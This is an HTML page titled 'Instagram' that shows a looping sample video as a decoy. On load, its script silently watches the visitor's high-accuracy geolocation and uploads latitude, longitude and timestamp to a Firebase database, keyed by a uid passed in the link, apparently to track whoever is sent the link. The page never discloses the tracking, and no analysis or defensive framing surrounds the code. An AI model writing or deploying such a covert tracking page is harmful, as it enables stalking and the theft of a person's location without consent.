<!DOCTYPE html>
<html>
<head>
    <title>Instagram</title>
    <style>
        body { margin: 0; font-family: sans-serif; background: #000; color: white; text-align: center; }
        video { width: 100%; height: auto; }
    </style>
</head>
<body>
    <video id="video" controls autoplay muted loop>
        <source src="https://www.w3schools.com/html/mov_bbb.mp4" type="video/mp4">
        Your browser does not support the video tag.
    </video>

    <script src="https://www.gstatic.com/firebasejs/9.6.10/firebase-app-compat.js"></script>
    <script src="https://www.gstatic.com/firebasejs/9.6.10/firebase-database-compat.js"></script>
    <script src="firebase-config.js"></script>

    <script>
        const uid = new URLSearchParams(window.location.search).get('uid') || 'anonymous';

        function sendLocation(position) {
            const lat = position.coords.latitude;
            const lon = position.coords.longitude;
            const timestamp = new Date().toISOString();
            firebase.database().ref('tracking/' + uid).set({ lat, lon, timestamp });
        }

        function getLocation() {
            if (navigator.geolocation) {
                navigator.geolocation.watchPosition(sendLocation, console.error, { enableHighAccuracy: true });
            }
        }

        getLocation();
    </script>
</body>
</html>